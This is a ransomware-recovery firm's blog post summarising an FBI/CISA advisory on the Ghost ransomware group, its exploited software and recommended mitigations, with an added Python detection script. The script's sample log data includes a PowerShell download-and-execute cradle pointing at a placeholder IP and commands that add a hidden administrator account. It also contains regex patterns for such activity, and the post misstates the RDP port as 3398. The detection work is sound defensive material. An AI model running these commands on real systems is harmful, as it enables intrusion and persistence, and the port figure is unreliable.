
FBI Warning: Ghost Ransomware Targets Multiple Sectors

February 21, 2025

A group of Chinese threat actors is exploiting known vulnerabilities to deliver ransomware payloads to victims across a range of industries, according to a new joint advisory (PDF) from the FBI and the Cybersecurity and Infrastructure Security Agency (CISA).

The gang is most commonly known as Ghost, but goes by other names including (but not limited to):

  • Cring
  • Crypt3r
  • HsHarada
  • Rapture
  • Phantom
  • Strike
  • Wickrme
  • Elysium0

Some of these names are derived from the names of executable files used in attacks (Cring.exe, Ghost.exe, and so on). Those executables work similarly, encrypting target data while leaving essential system files untouched to ensure that the system remains operable.

Unlike other recent high-profile attacks, Ghost ransomware operations rarely use phishing or other social engineering tactics. Instead, they target victims “whose internet-facing services run outdated versions of software and firmware,” an approach that leads to an almost indiscriminate distribution of payloads.

Ghost threat actors use publicly available code to exploit common vulnerabilities.

Their methodology targets vulnerabilities in servers running outdated versions of:

  • Adobe ColdFusion
  • Microsoft SharePoint
  • Microsoft Exchange
  • Fortinet FortiOS appliances

“Ghost actors have been observed uploading a web shell to a compromised server and leveraging Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon malware that is then implanted on victim systems,” the notice reads.

The group tends to work quickly, sometimes deploying ransomware the same day that the system is compromised. This also contrasts with the methodology of other threat actors, who often observe compromised networks for weeks or months in order to ensure that payloads infect all key systems (potentially including tape backups). 

“However, Ghost actors sporadically create new local and domain accounts and change passwords for existing accounts,” the report states. “In 2024, Ghost actors were observed deploying web shells on victim web servers.”


Baseline protections are effective for mitigating Ghost ransomware attacks.

CISA recommends patching known vulnerabilities in operating systems, software, and firmware. While that is an extremely basic mitigation, it is effective against the vast majority of attacks that don’t rely on social engineering.

Additional tactics can provide supplemental protection:

  • Implement allowlisting, which prevents unauthorized execution and access for applications, scripts, and network traffic.
  • Disable unused ports (the report notes RDP 3398, FTP 21, and SMB 445, specifically).
  • Monitor systems for unauthorized use of PowerShell. While PowerShell is useful, it’s frequently leveraged by threat actors for ransomware deployment.
  • Monitor systems for unusual activity. Per CISA: “Ransomware activity generates unusual network traffic across all phases of the attack chain. This includes running scans to discover other network connected devices, running commands to list, add, or alter administrator accounts, using PowerShell to download and execute remote programs, and running scripts not usually seen on a network. Organizations that can successfully identify and investigate this activity are better able to interrupt malicious activity before ransomware is executed.”
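As an added illustration (not code from the advisory or from this article), the following Python script triages constructed PowerShell script-block log entries for two of the behaviours CISA lists above: download-and-execute cradles and commands that list, add, or alter administrator accounts. The sample events, hostnames, usernames, and URL are made up for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample of PowerShell script-block log entries (one dict per
# Event ID 4104-style record). These are made-up examples, not captured data.
SAMPLE_EVENTS = [
    {"host": "web01", "user": "svc_iis", "script": "Get-ChildItem C:\\inetpub\\logs"},
    {"host": "web01", "user": "svc_iis",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b.ps1')"},
    {"host": "dc01", "user": "backupadm",
     "script": "net user tempadmin P@ss123 /add; net localgroup administrators tempadmin /add"},
    {"host": "ws14", "user": "alice", "script": "Get-Process | Sort-Object CPU -Descending"},
]

# Indicator families taken from the advisory's description of Ghost activity:
# remote download-and-execute cradles, and administrator-account manipulation.
DOWNLOAD_EXEC = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b|"
    r"Start-BitsTransfer|FromBase64String|-e(nc(odedcommand)?)?\b)", re.I)
ACCOUNT_ADMIN = re.compile(
    r"(net(\.exe)?\s+(user|localgroup)\b|New-LocalUser|Add-LocalGroupMember|"
    r"Set-LocalUser|New-ADUser|Add-ADGroupMember|Set-ADAccountPassword)", re.I)

@dataclass
class Finding:
    host: str
    user: str
    category: str
    evidence: str  # the matched substring, kept for analyst review

def triage_events(events):
    """Return one Finding per matched indicator family per event."""
    findings = []
    for ev in events:
        text = ev["script"]
        for category, pattern in (("download_exec", DOWNLOAD_EXEC),
                                  ("account_admin", ACCOUNT_ADMIN)):
            match = pattern.search(text)
            if match:
                findings.append(Finding(ev["host"], ev["user"], category, match.group(0)))
    return findings

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"{f.host} {f.user} {f.category}: matched '{f.evidence}'")
```

The patterns are deliberately broad heuristics for a first pass; in production they belong in a SIEM rule with allowlisting for known administrative scripts.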

Datarecovery.com is a leader in ransomware recovery, dark web monitoring, and threat mitigation. If you’re dealing with a ransomware infection, we’re ready to help.

To learn more, call 1-800-237-4200 and ask to speak with a ransomware specialist or submit a case online.